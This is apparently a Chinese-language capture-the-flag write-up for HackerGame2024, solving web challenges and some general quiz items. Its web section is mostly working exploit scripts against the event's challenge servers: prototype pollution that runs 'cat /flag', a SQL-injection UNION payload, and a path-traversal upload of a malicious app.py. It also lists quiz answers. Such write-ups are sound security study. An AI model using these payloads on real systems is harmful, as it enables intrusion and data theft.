HackerGame2024 Writeup

Web

比大小

观察到游戏会将全部的数组state.values在一开始就给出
并且提交方式也是将一串大于或小于号使用submit函数提交
于是构造JS脚本如下:

submit(state.values.map(pair => pair[0] < pair[1] ? '<' : '>'));

Node.js is Web Scale

审计源码发现漏洞点:

app.post("/set", (req, res) => {
  const { key, value } = req.body;

  const keys = key.split(".");
  let current = store;

  for (let i = 0; i < keys.length - 1; i++) {
    const key = keys[i];
    if (!current[key]) {
      current[key] = {};   //漏洞点
    }
    current = current[key];
  }

  // Set the value at the last key
  current[keys[keys.length - 1]] = value;

  res.json({ message: "OK" });
});

这里使用__proto__键名即可污染到对象原型
利用代码:

import requests  
  
base_url = "https://chal03-bx5x5egt.hack-challenge.lug.ustc.edu.cn:8443/"

payload = {  
    "key": "__proto__.flagcmd",  
    "value": "cat /flag"  
}  
r = requests.post(f"{base_url}/set", json=payload)  
print("Response:", r.text)  
  
r = requests.get(f"{base_url}/execute?cmd=flagcmd")  
print("Flag:", r.text)

PaoluGPT

首先遍历一遍*/list*下的所有链接，发现第一个flag

import requests  
from bs4 import BeautifulSoup  
import re  
  
def check_links_for_flag():  
    base_url = "https://chal01-qtdi3xsf.hack-challenge.lug.ustc.edu.cn:8443"  
    session = requests.Session()  
  
    session.cookies[  
        'session'] = "eyJ0b2tlbiI6IjE1NDA6TUVVQ0lCSEVXVXhrbnc3OGRTSHRTS0J5RjVPU25HR3Q0K3ZXNWFkZk5LWGlQbHhEQWlFQXZVTWFPMzdmZ0hjVUZNNjFXNGZDbkRmS0hCSXdXQ0VOL3pQaVdWNmY2K1k9In0.Zyz_Rg.dCrUq3qREmG2VearuQW1FUYMRZQ"  
  
    list_page = session.get(f"{base_url}/list")  
    soup = BeautifulSoup(list_page.text, 'html.parser')  
    links = soup.find_all('a', href=True)  
  
    print(f"找到 {len(links)} 个链接")  
  
    for link in links:  
        href = link['href']  
        if href.startswith('/view'):  
            try:  
                response = session.get(f"{base_url}{href}")  
                if 'flag{' in response.text or 'FLAG{' in response.text:  
                    print(f"\n在链接 {href} 中发现flag:")  
                    flags = re.findall(r'flag{[^}]+}', response.text)  
                    for flag in flags:  
                        print(flag)  
            except Exception as e:  
                print(f"访问 {href} 时出错: {str(e)}")  
  
  
if __name__ == "__main__":  
    check_links_for_flag()

在审计list路由代码时发现了只显示参数shown = true的title
而view路由中又产生了SQL注入
在隐藏的对话里找到flag

import requests  
  
  
def exploit_sql_injection():  
    base_url = "https://chal01-qtdi3xsf.hack-challenge.lug.ustc.edu.cn:8443"  
    session = requests.Session()  
  
    session.cookies[  
        'session'] = "eyJ0b2tlbiI6IjE1NDA6TUVVQ0lCSEVXVXhrbnc3OGRTSHRTS0J5RjVPU25HR3Q0K3ZXNWFkZk5LWGlQbHhEQWlFQXZVTWFPMzdmZ0hjVUZNNjFXNGZDbkRmS0hCSXdXQ0VOL3pQaVdWNmY2K1k9In0.Zyz_Rg.dCrUq3qREmG2VearuQW1FUYMRZQ"  
  
    payload = "' UNION ALL SELECT title, contents FROM messages WHERE title LIKE '%flag%' OR contents LIKE '%flag%' --"  
  
    try:  
        response = session.get(f"{base_url}/view?conversation_id={payload}")  
        if 'flag' in response.text:  
            print("flag内容:")  
            print(response.text)  
    except Exception as e:  
        print(f"执行出错: {str(e)}")  
  
  
if __name__ == "__main__":  
    exploit_sql_injection()

禁止内卷

由于flask的启动命令为flask run --reload --host 0,可以上传一段恶意的app.py来泄露answer.json
发现存在目录穿越漏洞，可以直接将app.py传到网站目录下，构造请求脚本

import requests  

exploit_code = """  
from flask import Flask  
app = Flask(__name__)  
  
@app.route('/leak')  
def leak():  
    try:        with open('answers.json', 'r') as f:            return f.read()    except Exception as e:        return str(e) 
  
if __name__ == '__main__':  
    app.run()"""  

url = "https://chal02-hj5reaab.hack-challenge.lug.ustc.edu.cn:8443/submit"
files = {  
    'file': ('../../tmp/web/app.py', exploit_code)  
}  

response = requests.post(url, files=files)  
#print("Upload response:", response.text)  

leak_url = "https://chal02-hj5reaab.hack-challenge.lug.ustc.edu.cn:8443/leak"  
response = requests.get(leak_url)  
print("Leak response:", response.text)

General

猫咪问答

3A204
2682
程序员的自我修养
336
6e90b6
1833

打不开的盒

放到SOLIDWORKS调一下不透明度即可

旅行照片4.0

善用Google，直接开盒
积水潭医院

菜单

分享

HackerGame2024 Writeup

HackerGame2024 Writeup

Web

比大小

Node.js is Web Scale

PaoluGPT

禁止内卷

General

猫咪问答

打不开的盒

旅行照片4.0